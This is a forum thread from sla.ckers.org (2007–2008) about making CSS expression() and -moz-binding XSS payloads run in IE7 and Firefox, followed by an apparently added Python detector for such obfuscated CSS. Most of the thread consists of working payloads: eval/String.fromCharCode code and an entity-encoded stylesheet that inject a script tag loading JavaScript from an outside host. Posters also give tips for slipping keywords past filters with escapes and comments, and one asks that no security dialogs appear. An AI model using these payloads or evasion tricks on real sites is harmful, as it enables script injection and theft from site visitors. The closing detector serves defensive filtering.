Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
expression: doesn't work in IE?
Posted by: mpcidm
Date: November 27, 2007 07:45PM

Hey guys, I'm trying to run this code (http://pastebin.com/f62d771e8), but I can't get it to work in IE7. What am I doing wrong? I need to use the img STYLE, with the "width:expression()" (can't use any other method on this website). With just "width:expression()" I can only do one statement, otherwise nothing happens. I need to execute multiple statements, as in the code.

As I don't have access to a box with IE7 anymore, it'd be great if you could test any code yourself, and make sure no security dialogs pop up during execution.

Any help appreciated. Thanks!

Re: expression: doesn't work in IE?
Posted by: Gareth Heyes
Date: November 28, 2007 03:53AM

Yes it does.

Read this post by Martin, it may help:-
http://the-mice.co.uk/switch/?p=39

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Re: expression: doesn't work in IE?
Posted by: Martin
Date: December 02, 2007 04:49AM

You can actually bind to anything:expression() - I normally use xx:expression

The trick for multiple statements is to use an eval:

style="xx: expression((window.r!=1) ? eval('x=String.fromCharCode;scr=document.createElement(x(115,99,114,105,112,116));scr.setAttribute(x(115,114,99),x(104,116,116,112,58,47,47,ETC));document.getElementById(x(99,104,101,109,45,110,97,118,45,102,111,114,117,109)).appendChild(scr);window.r=1;') : 1);

Here's an example from the post that Gareth mentioned. You need to decode/change the listed numbers to actual useful values to embed the <script> tag. Gareth's Hackvertor will help you construct a working string for this.

http://www.the-mice.co.uk/switch/ Switch/Twitch
http://code.google.com/p/dotnetids .NETIDS

Re: expression: doesn't work in IE?
Posted by: DoctorDan
Date: December 09, 2007 02:51PM

I have a question...
did I come up with the window.r / ternary operator idea? I first posted it here at http://sla.ckers.org/forum/read.php?2,15812,page=1 , but I'm not sure if it was seen anywhere else beforehand. Because I always see the r variable used as I posted it, I think I may actually have contributed something here :P

Sorry, just wondering...
-Dan

Re: expression: doesn't work in IE?
Posted by: Gareth Heyes
Date: December 09, 2007 03:57PM

@DoctorDan

If you were the first then I'm sorry I should have provided you with credit.
It wasn't deliberate, we're all friends here. I'll credit you on my blog as well.

Re: expression: doesn't work in IE?
Posted by: Martin
Date: December 10, 2007 03:26AM

@DoctorDan

My apologies also - it's such a good tip that I saved it at the time and then completely forgot where it came from!

Re: expression: doesn't work in IE?
Posted by: Gareth Heyes
Date: December 10, 2007 03:53AM

@DoctorDan

I've updated my post on ultimate XSS CSS injection with credit for you:-
http://www.thespanner.co.uk/2007/11/26/ultimate-xss-css-injection/

Please let me know if you have a blog and I'll add a link too

Re: expression: doesn't work in IE?
Posted by: DoctorDan
Date: December 10, 2007 05:07PM

@ Gareth Heyes and Martin

Wow! Thanks for the responses Gareth and Martin! Definitely no need for apologies or anything. I'm just glad that I could contribute something. This community basically kicks ass.

-Dan

I left comments on your blogs, too. The progression/creation of that CSS injection is awesome.

Re: expression: doesn't work in IE?
Posted by: Gareth Heyes
Date: December 11, 2007 12:50AM

Hey, no probs Dan, we're sorry to have missed the credit the first time. Great work, it was a very good tip :) Yeah, you're right, this forum kicks ass!

Re: expression: doesn't work in IE?
Posted by: noconnexion
Date: January 20, 2008 01:31PM

Based on The Spanner - Ultimate XSS CSS injection by Gareth Heyes, I would like to use his XSS CSS injection through a CSS file. This may sound like a simple task, but I had a lot of trouble making this work for IE7.

I've tried to explain this pretty well here hxxp://noconnexion.wordpress.com/ but I guess I was ignored because of my noob question so I've decided to try to steal 5 min from someone's time on this forum.

Let's get to the point. As stated, I would like to have these 3 files work together on IE7.

test.html
--------------------------------------
<html>
<body>

<link rel="stylesheet" type="text/css" href="test.css">
<div id="navigation">-- Test --</div>

</body>
</html>
--------------------------------------

test.css - and I'm pretty sure this is where I need to work on it
--------------------------------------
div#navigation
{
\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss);&#x78&#x78&#x3A&#x20&#x65&#x5C&#x78&#x70&#x5C&#x72&#x65&#x5C&#x73&#x5C&#x73&#x5C&#x69&#x5C&#x6F&#x5C&#x6E&#x28&#x28&#x77&#x69&#x6E&#x64&#x6F&#x77&#x2E&#x72&#x21&#x3D&#x31&#x29&#x20&#x3F&#x20&#x65&#x76&#x61&#x6C&#x28&#x27&#x78&#x3D&#x53&#x74&#x72&#x69&#x6E&#x67&#x2E&#x66&#x72&#x6F&#x6D&#x43&#x68&#x61&#x72&#x43&#x6F&#x64&#x65&#x3B&#x73&#x63&#x72&#x3D&#x64&#x6F&#x63&#x75&#x6D&#x65&#x6E&#x74&#x2E&#x63&#x72&#x65&#x61&#x74&#x65&#x45&#x6C&#x65&#x6D&#x65&#x6E&#x74&#x28&#x78&#x28&#x31&#x31&#x35&#x2C&#x39&#x39&#x2C&#x31&#x31&#x34&#x2C&#x31&#x30&#x35&#x2C&#x31&#x31&#x32&#x2C&#x31&#x31&#x36&#x29&#x29&#x3B&#x73&#x63&#x72&#x2E&#x73&#x65&#x74&#x41&#x74&#x74&#x72&#x69&#x62&#x75&#x74&#x65&#x28&#x78&#x28&#x31&#x31&#x35&#x2C&#x31&#x31&#x34&#x2C&#x39&#x39&#x29&#x2C&#x78&#x28&#x31&#x30&#x34&#x2C&#x31&#x31&#x36&#x2C&#x31&#x31&#x36&#x2C&#x31&#x31&#x32&#x2C&#x35&#x38&#x2C&#x34&#x37&#x2C&#x34&#x37&#x2C&#x39&#x38&#x2C&#x31&#x31&#x37&#x2C&#x31&#x31&#x35&#x2C&#x31&#x30&#x35&#x2C&#x31&#x31&#x30&#x2C&#x31&#x30&#x31&#x2C&#x31&#x31&#x35&#x2C&#x31&#x31&#x35&#x2C&#x31&#x30&#x35&#x2C&#x31&#x31&#x30&#x2C&#x31&#x30&#x32&#x2C&#x31&#x31&#x31&#x2C&#x34&#x36&#x2C&#x39&#x39&#x2C&#x31&#x31&#x31&#x2C&#x34&#x36&#x2C&#x31&#x31&#x37&#x2C&#x31&#x30&#x37&#x2C&#x34&#x37&#x2C&#x31&#x30&#x38&#x2C&#x39&#x37&#x2C&#x39&#x38&#x2C&#x31&#x31&#x35&#x2C&#x34&#x37&#x2C&#x31&#x32&#x30&#x2C&#x31&#x31&#x35&#x2C&#x31&#x31&#x35&#x2C&#x34&#x37&#x2C&#x31&#x32&#x30&#x2C&#x31&#x31&#x35&#x2C&#x31&#x31&#x35&#x2C&#x34&#x36&#x2C&#x31&#x30&#x36&#x2C&#x31&#x31&#x35&#x29&#x29&#x3B&#x64&#x6F&#x63&#x75&#x6D&#x65&#x6E&#x74&#x2E&#x67&#x65&#x74&#x45&#x6C&#x65&#x6D&#x65&#x6E&#x74&#x42&#x79&#x49&#x64&#x28&#x78&#x28&#x20&#x31&#x30&#x35&#x2C&#x31&#x31&#x30&#x2C&#x31&#x30&#x36&#x2C&#x31&#x30&#x31&#x2C&#x39&#x39&#x2C&#x31&#x31&#x36&#x20&#x29&#x29&#x2E&#x61&#x70&#x70&#x65&#x6E&#x64&#x43&#x68&#x69&#x6C&#x64&#x28&#x73&#x63&#x72&#x29&#x3B&#x77&#x69&#x6E&#x64&#x6F&#x77&#x2E&#x72&#x3D&#x31&#x3B&#x27&#x29 : 1);
}
---------------------------------------

and xss.js, which needs nothing to be done and is located here: hxxp://businessinfo.co.uk/labs/xss/xss.js

The "source code" before it was Hackvertored, I guess, is this one:

\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss);xx: e\xp\re\s\s\i\o\n((window.r!=1) ? eval('x=String.fromCharCode;scr=document.createElement(x(115,99,114,105,112,116));scr.setAttribute(x(115,114,99),x(http://businessinfo.co.uk/labs/xss/xss.js));document.getElementById(x( 105,110,106,101,99,116 )).appendChild(scr);window.r=1;') : 1);

Have to mention that I have tried to include the css with @import and same result but I'm pretty sure this is not the point. The above files work on FF but not in IE7.
Can someone give me an answer ? PLEASE.

Ty.

Re: expression: doesn't work in IE?
Posted by: riahmatic
Date: January 21, 2008 01:31AM

@noconnexion
I think the backslashes in e\xp\re\s\s\i\o\n are breaking the vector in IE. Instead of backslashes you could use comments in it like: expres/**/sion. You could place /*woohoocomment*/ between every char if you wanted and it'd still work.

Re: expression: doesn't work in IE?
Posted by: Gareth Heyes
Date: January 21, 2008 03:42AM

@noconnexion

Sorry for the delay in getting back to you but I didn't have much time. I've finally got my hands on a crappy windoze box (I'm defo gonna get a VM going in future) and I've successfully tested both an external style sheet and an inline style on both browsers.

Inline:-
http://www.businessinfo.co.uk/labs/ultimate_xss_css/ultimate_xss_css1.php

Stylesheet:
http://www.businessinfo.co.uk/labs/ultimate_xss_css/ultimate_xss_css2.php

I've also updated Hackvertor to make it easier to create these vectors:-
http://www.businessinfo.co.uk/labs/hackvertor/hackvertor.php?input=PEBtb3piaW5kaW5nZXhwcmVzc2lvbj55b3VydXJsLmpzPEAvbW96YmluZGluZ2V4cHJlc3Npb24%2B

You can use Hackvertor to encode the styles further but I'll leave that up to you to experiment. Hope that helps

*NOTE* Firefox + Noscript silently disables mozbinding

Re: expression: doesn't work in IE?
Posted by: noconnexion
Date: January 21, 2008 06:03PM

@riahmatic - Thanks for the reply, and I understand what you mean, but this doesn't work either. I tried plain expression before, and I think it's equal to e\xp\re\s\s\i\o\n or expres/**/sion, at least in this case.

@Gareth Heyes - I appreciate that you have answered, but I guess I'm either dumb or blind, as I cannot see any .css file in your examples. As stated earlier, "I would like to have these 3 files work together on IE7." test.html, test.css, xss.js. And if you are going to say that I need to take what's between <div style=" THIS " id="inject"> and place it into the .css file like I did earlier here, div#inject { THIS }, please don't, as I've done that many many times and it won't work. Or maybe there is something I'm missing here, and if so I apologise in advance.

Re: expression: doesn't work in IE?
Posted by: Gareth Heyes
Date: January 21, 2008 06:41PM

@noconnexion

The second example separates the style and HTML so it would be possible to use an external CSS file instead of the <style> tags. I didn't provide that because it's pretty easy to sort out.

Re: expression: doesn't work in IE?
Posted by: noconnexion
Date: January 21, 2008 08:17PM

Finally YES.

My mistake was in how I imported the .css into the HTML.

I used <link rel="stylesheet" type="text/css" href="test.css">
<div id="navigation">-- Test --</div> to import the .css

instead of

<style type="text/css">
@import url(http://www.example.com/css/last.css);
</style>

I guess it will still need to be Hackvertored even in the .css because of filters, right?

Anyway, thanks for your support and I think I'll stick around here cuz I really like the stuff in here ... maybe I can really contribute some day.
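
The thread shows three ways the keywords get hidden from a naive filter: backslash escapes (e\xp\re\s\s\i\o\n, \-\mo\z\-b\i\nd\in\g), /**/ comments inside the word (riahmatic's expres/**/sion), and HTML entities when the value travels through a style attribute. The detector below is an added example, not code from the thread, from Hackvertor or from The Spanner; it is the server-side check that noconnexion's "it will still need to be Hackvertored because of filters" is up against. It peels those layers in the order a browser does (entity decode, strip comments, resolve CSS escapes) and only then looks for expression(, -moz-binding and @import. All sample values and the example.invalid hosts are constructed for this example.

```python
import html
import re

# Added example, not code from the thread: normalise a CSS value by undoing
# the obfuscation layers discussed in the thread, then look for the constructs
# the thread shows being abused. Samples at the bottom are constructed.

CSS_COMMENT = re.compile(r"/\*.*?\*/", re.S)
# CSS escape: backslash + 1..6 hex digits (plus one optional whitespace),
# or backslash + any single character (\x -> x, \- -> -, \/ -> /).
CSS_ESCAPE = re.compile(r"\\([0-9a-fA-F]{1,6})[ \t\n\r\f]?|\\(.)", re.S)

# Constructs this thread shows being used; matched on the normalised value
# with all whitespace removed, so "expression (" is still caught.
FLAGGED = ("expression(", "-moz-binding", "@import")


def decode_css_escapes(value):
    """Replace CSS backslash escapes with the characters they denote."""
    def repl(m):
        if m.group(1) is not None:
            return chr(int(m.group(1), 16))   # \65  -> 'e'
        return m.group(2)                     # \x   -> 'x'
    return CSS_ESCAPE.sub(repl, value)


def normalize_css(value):
    """Peel the encoding layers in the order a browser would apply them."""
    # 1. inside an HTML style="" attribute the HTML parser decodes entities
    #    before the CSS parser runs; for a plain .css file this is a no-op,
    #    so doing it unconditionally only makes the check more conservative
    value = html.unescape(value)
    # 2. the CSS tokenizer drops comments, so expres/**/sion reads as one word
    value = CSS_COMMENT.sub("", value)
    # 3. backslash escapes are resolved (e\xp\re\s\s\i\o\n, \65 xpression)
    value = decode_css_escapes(value)
    return value.lower()


def find_dangerous(value):
    """Return the flagged constructs present in the normalised value."""
    compact = re.sub(r"\s+", "", normalize_css(value))
    return [marker for marker in FLAGGED if marker in compact]


# Constructed samples (not from the thread), one per obfuscation style.
SAMPLES = {
    "plain": "width: expression(1)",
    "backslash": r"xx: e\xp\re\s\s\i\o\n(1)",
    "comment": "xx: expres/**/sion(1)",
    "hex_escape": r"xx: \65 xpression(1)",
    "entities": "&#x78&#x78&#x3A&#x20&#x65&#x5C&#x78&#x70&#x5C&#x72"
                "&#x65&#x5C&#x73&#x5C&#x73&#x5C&#x69&#x5C&#x6F&#x5C&#x6E"
                "&#x28&#x31&#x29",
    "mozbinding": r"\-\mo\z\-b\i\nd\in\g:\url(//example.invalid/xbl.xml#xss)",
    "import": "@im\\port url(//example.invalid/last.css);",
    "benign": "width: 100px; color: red",
}


def scan_samples(samples=SAMPLES):
    """Map each sample name to the flagged constructs found in it."""
    return {name: find_dangerous(css) for name, css in samples.items()}


if __name__ == "__main__":
    for name, hits in scan_samples().items():
        print(f"{name:12s} -> {hits or 'clean'}")
```

The order of the three steps matters: an escaped slash (`\/`) must not be mistaken for the start of a comment, so comments are stripped before escapes are resolved, and entity decoding comes first because that is what the HTML parser does before the CSS parser ever sees the value. A filter that checks for the literal word "expression" before normalising will pass every one of the obfuscated samples above.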
